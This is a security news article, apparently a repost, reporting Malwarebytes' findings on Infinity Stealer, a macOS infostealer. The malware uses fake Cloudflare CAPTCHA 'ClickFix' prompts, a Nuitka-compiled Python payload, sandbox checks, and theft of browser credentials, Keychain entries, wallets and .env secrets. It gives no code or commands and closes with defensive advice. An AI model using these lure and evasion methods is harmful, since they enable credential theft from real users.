CySecurity News - Latest Information Security and Hacking Incidents, EN

Infinity Stealer Targets macOS Using ClickFix Trick and Python-Based Malware

 

A newly identified information-stealing malware, dubbed Infinity Stealer, is targeting macOS users through a sophisticated attack chain that blends social engineering with advanced evasion techniques. Security researchers at Malwarebytes report that this is the first known campaign combining the ClickFix technique with a Python-based payload compiled using the Nuitka compiler.

The attack begins with a deceptive prompt designed to resemble a legitimate human verification step from Cloudflare. Victims are presented with a fake CAPTCHA and instructed to paste a command into the macOS Terminal to complete the verification. This method, known as ClickFix, tricks users into bypassing built-in operating system protections by executing malicious commands themselves. 

Once the command is executed, it decodes a hidden script that downloads and launches the next stage of the malware. The payload is compiled into a native macOS binary using Nuitka, which converts Python code into C-based executables. This approach makes the malware significantly harder to detect and analyze compared to traditional Python-based threats that rely on bytecode packaging tools.

The infection chain unfolds in multiple stages. After the initial script runs, it installs a loader that extracts the final malware payload. Before initiating its malicious activities, the malware performs checks to determine whether it is running in a virtual or sandboxed environment, helping it evade detection by security tools.
 

Once active, Infinity Stealer begins harvesting sensitive information from the infected system. This includes login credentials stored in Chromium-based browsers and Firefox, entries from the macOS Keychain, cryptocurrency wallet data, and plaintext secrets found in developer files such as .env configurations. It can also capture screenshots, adding another layer of data collection.

The stolen information is then transmitted to attacker-controlled servers via HTTP requests. 

Additionally, notifications are sent through Telegram to alert threat actors when data exfiltration is complete, enabling real-time monitoring of compromised systems.

Researchers warn that this campaign highlights the growing sophistication of threats targeting macOS, a platform often perceived as more secure. The use of social engineering combined with advanced compilation techniques demonstrates how attackers are evolving their methods to bypass traditional defenses.

Users are strongly advised to avoid executing unknown commands in Terminal, especially those obtained from untrusted sources, as such actions can directly compromise system security.

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents

Read the original article: